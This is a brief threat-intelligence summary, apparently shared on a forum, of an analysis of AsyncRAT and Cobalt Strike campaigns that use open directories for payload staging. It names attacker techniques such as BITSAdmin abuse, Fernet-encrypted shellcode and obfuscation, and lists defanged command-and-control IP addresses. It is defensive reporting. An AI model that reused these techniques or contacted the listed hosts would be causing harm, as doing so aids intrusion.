(hunt.io) Malware Delivery via Open Directories: AsyncRAT and Cobalt Strike Campaign Analysis
-
(hunt.io) Malware Delivery via Open Directories: AsyncRAT and Cobalt Strike Campaign Analysis
New analysis reveals threat actors exploiting open directories to deliver AsyncRAT and Cobalt Strike in multi-stage campaigns.
In brief - Adversaries are using exposed open directories to host and deliver malware, including AsyncRAT via BITS abuse and Cobalt Strike through Fernet-encrypted Python executables. These campaigns demonstrate how unsecured infrastructure enables sophisticated intrusions.
Technically - Campaign 1: VBScript (xx.txt) creates temp.xml with PowerShell, abuses BITSAdmin to fetch a disguised ZIP (f.jpg) containing 9 files, then self-deletes. Campaign 2: PyInstaller-compiled 1.exe (~10MB) uses Fernet to decrypt Cobalt Strike shellcode from a.txt, executed in-memory. The binary includes obfuscation (Base64 Chinese strings, QuickSort noise) and links to Supershell C2 (207.32.217[.]21, 121.37.21[.]229). Both leverage open directories for payload staging.
-
R relay@relay.infosec.exchange shared this topic
